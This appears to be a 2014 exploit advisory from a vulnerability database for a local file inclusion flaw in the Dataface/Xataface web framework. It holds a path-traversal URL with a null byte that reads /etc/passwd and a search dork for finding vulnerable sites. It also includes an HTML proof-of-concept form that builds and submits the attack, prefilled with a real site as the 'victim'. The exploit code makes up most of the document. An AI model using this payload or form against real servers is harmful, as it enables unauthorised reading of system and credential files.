Dataface Local File Include

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Dataface Local File Include vulnerability with a sample exploi

                                                //==========================================================================
//( #Topic    : Dataface
//( #Bug type : local file include
//( #Advisory : http://xataface.com/
//==========================================================================
//( #Author : ItSecTeam
//( #Email  : [email protected]
//( #Website: http://www.itsecteam.com
//( #Forum  : http://forum.ITSecTeam.com
//( #dork   : Powered by Dataface
//( #Thanks : ahmadbady
//---------------------------------------------------------------------

Sample:
http://server/index.php?-action=../../../../../../etc/passwd%00

Poc:

&#60;html&#62;
&#60;head&#62;
&#60;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=windows-1254&#34;&#62;
&#60;title&#62;coded by ITSecTeam&#60;/title&#62;

&#60;script language=&#34;JavaScript&#34;&#62;

 function it(){
                xpl.action=
xpl.victim.value+xpl.path.value+xpl.file.value+xpl.lfi.value;xpl.submit();

            }
&#60;/script&#62;

&#60;/head&#62;

&#60;body bgcolor=&#34;#FFFFFF&#34;&#62;

&#60;p align=&#34;left&#34;&#62;&#60;font color=&#34;#0000FF&#34;&#62;Dataface portal lfi vuln&#60;/font&#62;&#60;/p&#62;
&#60;p align=&#34;left&#34;&#62;&#60;font
color=&#34;#0000FF&#34;&#62;-----------------------------------&#60;/font&#62;&#60;/p&#62;
&#60;form method=&#34;post&#34; name=&#34;xpl&#34; onSubmit=&#34;it();&#34;&#62;
    &#60;p align=&#34;left&#34;&#62;
    &#60;font
size=&#34;2&#34; face=&#34;Tahoma&#34;&#62;
    victim:
    &#60;input type=&#34;text&#34; name=&#34;victim&#34; size=&#34;33&#34;;&#34; style=&#34;color: #FFFFFF;
background-color: #000000&#34; value=&#34;http://apps.weblite.ca&#34;&#62;
    path:
    &#60;input type=&#34;text&#34; name=&#34;path&#34; size=&#34;20&#34;;&#34; style=&#34;color: #FFFFFF;
background-color: #000000&#34; value=&#34;/&#34;&#62;
    file:
    &#60;input type=&#34;text&#34; name=&#34;file&#34; size=&#34;20&#34;;&#34; style=&#34;color: #FFFFFF;
background-color: #000000&#34; value=&#34;index.php?-action=&#34;&#62;
    &#60;/font&#62;
    &#60;/p&#62;
        &#60;p align=&#34;left&#34;&#62;
    &#60;font
size=&#34;2&#34; face=&#34;Tahoma&#34;&#62;
    lfi:
    &#60;input type=&#34;text&#34; name=&#34;lfi&#34; size=&#34;115&#34;;&#34; style=&#34;color: #FFFFFF;
background-color: #000000&#34; value=&#34;../../../../../../etc/passwd%00&#34;&#62;
    &#60;/p&#62;
    &#60;/p&#62;
&#60;center&#62;

&#60;/p&#62;
  &#60;p&#62;&#60;input type=&#34;submit&#34; value=&#34;GO&#34; name=&#34;B1&#34; style=&#34;float: left&#34;&#62;&#60;input
type=&#34;reset&#34;
value=&#34;reset&#34; name=&#34;B2&#34; style=&#34;float: left&#34;&#62;&#60;/p&#62;
&#60;/form&#62;
&#60;p&#62;&#60;br&#62;
 &#60;/p&#62;
&#60;/center&#62;
&#60;font
color=&#34;#0000FF&#34;&#62;------------------------------------------&#60;/font&#62;&#60;/body&#62;&#60;/body&#62;

&#60;/html&#62;
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1